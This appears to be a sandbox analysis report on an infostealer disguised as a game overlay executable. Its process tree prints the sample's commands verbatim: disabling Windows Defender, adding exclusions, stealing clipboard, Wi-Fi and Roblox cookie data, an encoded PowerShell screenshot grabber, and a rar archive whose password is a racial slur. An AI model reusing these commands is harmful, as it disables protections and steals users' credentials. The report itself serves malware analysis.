Analysis

  • max time kernel
    18s
  • max time network
    19s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/04/2025, 20:05

General

  • Target

    hoarder lifesteal overlay.exe

  • Size

    7.8MB

  • MD5

    d02b9386944c94fc20fcbcd5b4be2b49

  • SHA1

    2a53cdd4e89eedcf4092e170047ba7a08a06e35d

  • SHA256

    c6d552a9afccaaf92688218894eba03a7c788c545dc95bc7a7f8ddcba10665bb

  • SHA512

    13afce2f0388a61435e67ff6d49adafed282d989181cf61f07cbdbde707161e7f3010acc2808c7290945ab8a65dc39f4b90871e1c03ba3bf0981bfbd6eb30fd8

  • SSDEEP

    196608:UWUHUOXXKApXkj9fZwQRCgiIKpdzjPOan7j2y283TOnO+:qxCw8wIKppDO9i+

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe
    "C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4404
    • C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe
      "C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3160
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2500
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4908
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5520
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please rerun this application.', 0, 'Rerun!', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2260
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please rerun this application.', 0, 'Rerun!', 48+16);close()"
          4⤵
            PID:4916
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‌‌.scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5716
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‌‌.scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1856
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5008
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3060
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5016
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:316
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5072
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:940
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:412
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:832
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2632
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4568
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5612
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:1136
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:1448
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:3384
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5448
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:5732
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1536
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              4⤵
                PID:4012
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5132
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2620
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\whoczw1f\whoczw1f.cmdline"
                  5⤵
                    PID:4640
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8ACB.tmp" "c:\Users\Admin\AppData\Local\Temp\whoczw1f\CSCE021FFA3F1F425399F59368D7E0FA46.TMP"
                      6⤵
                        PID:3084
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5108
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:2088
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                    3⤵
                      PID:244
                      • C:\Windows\system32\attrib.exe
                        attrib -r C:\Windows\System32\drivers\etc\hosts
                        4⤵
                        • Drops file in Drivers directory
                        • Views/modifies file attributes
                        PID:2112
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:4288
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:2836
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                          3⤵
                            PID:3592
                            • C:\Windows\system32\attrib.exe
                              attrib +r C:\Windows\System32\drivers\etc\hosts
                              4⤵
                              • Drops file in Drivers directory
                              • Views/modifies file attributes
                              PID:1676
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:5720
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:5932
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                3⤵
                                  PID:2852
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    4⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4000
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:2212
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:4900
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:5848
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:4724
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                          3⤵
                                            PID:1452
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4144
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                            3⤵
                                              PID:4908
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                4⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2792
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "getmac"
                                              3⤵
                                                PID:2816
                                                • C:\Windows\system32\getmac.exe
                                                  getmac
                                                  4⤵
                                                    PID:5504
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44042\rar.exe a -r -hp"nigga123" "C:\Users\Admin\AppData\Local\Temp\lIEB3.zip" *"
                                                  3⤵
                                                    PID:5140
                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI44042\rar.exe
                                                      C:\Users\Admin\AppData\Local\Temp\_MEI44042\rar.exe a -r -hp"nigga123" "C:\Users\Admin\AppData\Local\Temp\lIEB3.zip" *
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:656
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                    3⤵
                                                      PID:5236
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic os get Caption
                                                        4⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3252
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                      3⤵
                                                        PID:5768
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic computersystem get totalphysicalmemory
                                                          4⤵
                                                            PID:980
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                          3⤵
                                                            PID:3896
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic csproduct get uuid
                                                              4⤵
                                                                PID:4640
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                              3⤵
                                                                PID:2180
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                  4⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:1684
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                3⤵
                                                                  PID:4100
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic path win32_VideoController get name
                                                                    4⤵
                                                                    • Detects videocard installed
                                                                    PID:5624
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                  3⤵
                                                                    PID:5704
